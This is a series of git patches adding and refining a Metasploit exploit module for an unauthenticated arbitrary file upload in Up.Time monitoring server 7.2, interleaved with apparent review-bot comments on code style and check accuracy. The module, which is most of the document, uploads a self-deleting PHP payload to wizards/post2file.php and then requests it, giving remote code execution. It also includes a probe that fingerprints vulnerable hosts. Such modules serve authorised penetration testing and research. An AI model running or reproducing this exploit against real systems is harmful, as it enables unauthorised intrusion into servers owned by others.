From cfffd80d22866222232d217f2ef4e1b7c804a979 Mon Sep 17 00:00:00 2001
From: DoI
Date: Thu, 5 Dec 2013 11:56:05 +1300
Subject: [PATCH 1/5] Added uptime_file_upload exploit module
---
 .../exploits/linux/http/uptime_file_upload.rb | 96 +++++++++++++++++++
 1 file changed, 96 insertions(+)
 create mode 100644 modules/exploits/linux/http/uptime_file_upload.rb
diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb
new file mode 100644
index 0000000000..44306f0f26
--- /dev/null
+++ b/modules/exploits/linux/http/uptime_file_upload.rb
@@ -0,0 +1,96 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Up.Time Monitoring post2file.php Arbitrary File Upload', + 'Description' => %q{ + This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server + 7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading + to arbitrary code execution. + }, + 'Author' => + [ + 'Denis Andzakovic ' # Vulnerability discoverey and MSF module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf'] + ], + 'Payload' => + { + 'BadChars' => "\x00" + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Up.Time 7.2', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 19 2013')) + + register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),], self.class) + end + + def check + uri = target_uri.path + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'wizards', 'post2file.php') + }) + + if not res or res.code != 200 + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Appears + end + + def exploit + print_status("#{peer} - Uploading PHP to Up.Time server") + uri = target_uri.path + + peer = "#{rhost}:#{rport}" + @payload_name = "#{rand_text_alpha(5)}.php" + php_payload = get_write_exec_payload(:unlink_self=>true) + + data = Rex::MIME::Message.new + post_data 
= "file_name=#{@payload_name}&script=#{php_payload}" + + + print_status("#{peer} - Uploading payload #{@payload_name}") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), + 'data' => post_data, + 'headers' => { + 'Content-Type' => 'application/x-www-form-urlencoded' + } + }) + if not res or res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") + end + + print_status("#{peer} - Executing payload #{@payload_name}") + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'wizards', @payload_name), + 'method' => 'GET' + }) + end +end From 07294106cb78c090332752eec77ed47e62883b49 Mon Sep 17 00:00:00 2001 From: DoI Date: Thu, 5 Dec 2013 14:18:26 +1300 Subject: [PATCH 2/5] Removed redundant content-type parameter --- modules/exploits/linux/http/uptime_file_upload.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb index 44306f0f26..d5102a13ee 100644 --- a/modules/exploits/linux/http/uptime_file_upload.rb +++ b/modules/exploits/linux/http/uptime_file_upload.rb @@ -79,9 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), 'data' => post_data, - 'headers' => { - 'Content-Type' => 'application/x-www-form-urlencoded' - } }) if not res or res.code != 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") From 3d327363af41fe52f5f05f09594d0a1559195721 Mon Sep 17 00:00:00 2001 From: DoI Date: Fri, 6 Dec 2013 13:45:22 +1300 Subject: [PATCH 3/5] uptime_file_upload code tidy-ups --- .../exploits/linux/http/uptime_file_upload.rb | 25 +++++++++---------- 1 file changed, 12 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb index d5102a13ee..2e60fb4eb3 100644 
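Review bot: The result of the final `send_request_cgi` GET in `exploit` is assigned to `res` and never inspected, and `:unlink_self => true` only removes the uploaded file once the script actually executes, so a failed or blocked execution request leaves `#{@payload_name}` sitting in `wizards/` with no indication to the operator. Print the location before triggering it, e.g. `print_status("#{peer} - Payload uploaded to #{normalize_uri(uri, 'wizards', @payload_name)} (self-deletes on execution)")`, so a leftover shell can be cleaned up by hand; a reverse payload may legitimately hold the connection past the request timeout, so treat a nil `res` afterwards as a hint rather than a hard failure. Separately, `check` POSTs to post2file.php with no parameters at all; what the script does with a missing `file_name`/`script` pair is not visible here, so confirm the probe does not itself write a file on the target before relying on it as a non-destructive check.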
--- a/modules/exploits/linux/http/uptime_file_upload.rb +++ b/modules/exploits/linux/http/uptime_file_upload.rb @@ -1,8 +1,6 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## @@ -55,32 +53,33 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(uri, 'wizards', 'post2file.php') }) - if not res or res.code != 200 - return Exploit::CheckCode::Unknown + if res and res.code == 200 + return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Unknown + end def exploit print_status("#{peer} - Uploading PHP to Up.Time server") uri = target_uri.path - peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true) - data = Rex::MIME::Message.new - post_data = "file_name=#{@payload_name}&script=#{php_payload}" - + post_data = ({ + "file_name" => @payload_name, + "script" => php_payload + }) print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), - 'data' => post_data, + 'vars_post' => post_data, }) - if not res or res.code != 200 + unless res and res.code == 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end From 2ff9c31747435f0d5be938c7f9be3411958f881e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 6 Dec 2013 15:57:22 -0600 Subject: [PATCH 4/5] Do minor clean up on uptime_file_upload --- .../exploits/linux/http/uptime_file_upload.rb | 27 ++++++++++++------- 1 file changed, 17 insertions(+), 10 deletions(-) 
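Review bot: In the second hunk `post_data = ({ ... })` wraps a hash literal in parentheses it does not need, and both new conditions (`if res and res.code == 200` in `check`, `unless res and res.code == 200` in `exploit`) use `and`, whose low precedence becomes a trap as soon as the expression is assigned or combined (`ok = res and res.code == 200` binds as `(ok = res) and ...`). Prefer `post_data = { ... }` and `res && res.code == 200` in both places; behaviour is unchanged as written, this is purely how the code reads. Both `check` and `exploit` extend past the edges of this hunk.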
diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb index 2e60fb4eb3..d8cffe813e 100644 --- a/modules/exploits/linux/http/uptime_file_upload.rb +++ b/modules/exploits/linux/http/uptime_file_upload.rb @@ -14,11 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Up.Time Monitoring post2file.php Arbitrary File Upload', + 'Name' => 'Up.Time Monitoring Station post2file.php Arbitrary File Upload', 'Description' => %q{ - This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server - 7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading - to arbitrary code execution. + This module exploits an arbitrary file upload vulnerability found within the Up.Time + monitoring server 7.2 and below. A malicious entity can upload a PHP file into the + webroot without authentication, leading to arbitrary code execution. }, 'Author' => [ @@ -27,11 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - ['URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf'] + [ 'OSVDB', '100423' ], + [ 'BID', '64031'], + [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ] ], 'Payload' => { - 'BadChars' => "\x00" + 'Space' => 10000, # just a big enough number to fit any PHP payload + 'DisableNops' => true }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 
@@ -42,7 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 19 2013')) - register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),], self.class) + register_options([ + OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']), + Opt::RPORT(9999) + ], self.class) end def check @@ -53,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(uri, 'wizards', 'post2file.php') }) - if res and res.code == 200 + if res and res.code == 500 and res.body.to_s =~ /<\/title>/ return Exploit::CheckCode::Appears end @@ -66,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = target_uri.path @payload_name = "#{rand_text_alpha(5)}.php" - php_payload = get_write_exec_payload(:unlink_self=>true) + php_payload = get_write_exec_payload(:unlink_self => true) post_data = ({ "file_name" => @payload_name, @@ -79,7 +85,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), 'vars_post' => post_data, }) - unless res and res.code == 200 + + unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end From 3729c536900ac695993c86ee7bd60aa8cbb39eb8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 6 Dec 2013 15:57:52 -0600 Subject: [PATCH 5/5] Move uptime_file_upload to the correct location --- modules/exploits/{linux => multi}/http/uptime_file_upload.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/{linux => multi}/http/uptime_file_upload.rb (100%) diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/multi/http/uptime_file_upload.rb similarity index 100% rename from modules/exploits/linux/http/uptime_file_upload.rb rename to modules/exploits/multi/http/uptime_file_upload.rb
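Review bot: The new `check` condition treats any HTTP 500 whose body matches the title pattern as `Appears`, which fingerprints a PHP error page rather than Up.Time: whether an empty POST to `wizards/post2file.php` yields a 500 depends on the target's PHP error-display configuration, and an unrelated script at that path could satisfy it just as well. Unless the body also carries an Up.Time-specific marker, the honest result is the weaker `Exploit::CheckCode::Detected` (if this framework version offers it), keeping `Appears` for a response that actually identifies the product. Note also that the `check` pattern `/<\/title>/` is looser than the `/<title><\/title>/` used on the upload response later in the same commit; if both are meant to recognise the same empty-title page, use one pattern for both.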
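Review bot: The tightened upload check in the last hunk raises `UnexpectedReply` for any 200 whose body lacks `<title></title>`, but an unexpected body does not prove the write failed — post2file.php may already have stored `#{@payload_name}` before rendering something else, and the bare `Upload failed` message then hides a live PHP file in the webroot from the operator. Include the file name in the failure so it can be verified and removed: `fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Unexpected reply to upload; check wizards/#{@payload_name} on the target")`. `exploit` continues past the end of this hunk.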